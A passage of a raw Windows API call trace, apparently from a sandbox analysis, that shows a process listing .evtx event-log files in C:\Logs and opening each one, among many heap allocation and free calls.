dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.574] AreFileApisANSI () returned 1 [0086.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0086.574] AreFileApisANSI () returned 1 [0086.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0086.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0086.575] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.575] GetFileType (hFile=0x348) returned 0x1 [0086.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.575] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.575] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.575] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.575] CloseHandle (hObject=0x348) returned 1 [0086.576] AreFileApisANSI () returned 1 [0086.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0086.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0086.576] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.576] GetFileType (hFile=0x348) returned 0x1 [0086.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.576] CloseHandle (hObject=0x348) returned 1 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.577] AreFileApisANSI () returned 1 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0086.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0086.577] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.577] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ced8 [0086.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0086.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0086.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0086.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0086.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.758] AreFileApisANSI () returned 1 [0086.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpUsedDefaultChar=0x0) returned 68 [0086.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.758] AreFileApisANSI () returned 1 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0086.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x81fc8 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0086.758] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.759] GetFileType (hFile=0x348) returned 0x1 [0086.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0086.759] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.759] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.759] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.760] CloseHandle (hObject=0x348) returned 1 [0086.760] AreFileApisANSI () returned 1 [0086.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0086.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0086.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0086.760] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.760] GetFileType (hFile=0x348) returned 0x1 [0086.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0086.760] CloseHandle (hObject=0x348) returned 1 [0086.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.761] AreFileApisANSI () returned 1 [0086.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0086.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0086.761] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0086.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.761] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0086.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68bd0 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68bd0 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.762] InitOnceExecuteOnce (in: 